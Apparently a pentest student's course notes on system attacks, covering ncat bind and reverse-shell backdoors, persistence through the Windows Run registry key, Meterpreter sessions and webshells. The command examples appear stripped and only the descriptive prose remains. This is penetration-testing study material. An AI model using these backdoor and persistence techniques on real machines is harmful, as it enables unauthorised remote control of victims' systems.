⚙️System Attacks
Notes regarding Sys. Attacks from ePTS course + other recourses.
Classification:
🚪Backdoor
Ncat
install it in the victim machine and run it with these commands:
-l listen -e: excute file we choose cmd so we can excute commands.
attacker will
can also be executed as a reverse listener especially when the target is on another network:
in the Attacker machine listen:
-v: for verbose give us output.
in the target machine:
Persistent Backdoor:
in windows Register Editor in `HKEY_LOCALMACHINE\SOFTWARE\Microsoft\CurrentVersion\Run` we add string value for our ncat (or whatever we name it in the target machine) add command to run :
then restart the victim machine.
as soon as they logged in the attacker who's listening will et a shell.
Metasploit
using the Meterpreter (which's just like ncat above but with steroids).
Meterpreter:
is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.
Get persistence in target machine:
after hacking one machine you will have already a session that you can browse with sessions
command:
starter listener:
🔐Password Attacks
page🔐Password Attacks💦Buffer Overflow
Shell:
a program that executes commands, check this to see various languages and ways to execute a system commands(getting a shell):
open source webshells (read them before uploading them to a web server):
Last updated